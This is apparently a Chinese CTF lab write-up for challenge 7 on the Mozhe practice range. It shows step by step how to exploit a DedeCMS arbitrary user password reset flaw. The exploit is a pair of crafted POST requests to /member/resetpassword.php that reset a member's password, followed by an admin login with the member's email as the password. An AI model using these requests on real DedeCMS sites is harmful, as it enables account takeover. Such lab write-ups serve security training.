墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

DEDECMS 任意用户密码重置漏洞利用

 

开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号

利用burp 抓包改 Post

http://219.153.49.228:47764/member/resetpassword.php

POST /member/resetpassword.php HTTP/1.1
dopost=safequestion&safequestion=0.0&safeanswer=&id=2  (2为 test 的ID)

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

forward 之后 获取跳转页面 里面的 key 值

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

再用 burp post   
 

 /member/resetpassword.php 
dopost=getpasswd&setp=2&id=2&userid=test&key=5S3NSMNQ&pwd=123456&pwdok=123456


key  为刚刚获取的 key 值,重置密码为 123456

 

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

用 test  密码 123456 登录,登录成功个人基本资料 有电子邮箱

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

用 电子邮箱 登录 后台 http://219.153.49.228:47764/dede/login.php

帐号 admin  密码 电子邮箱

登录成功,key 在 网站根目录下

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)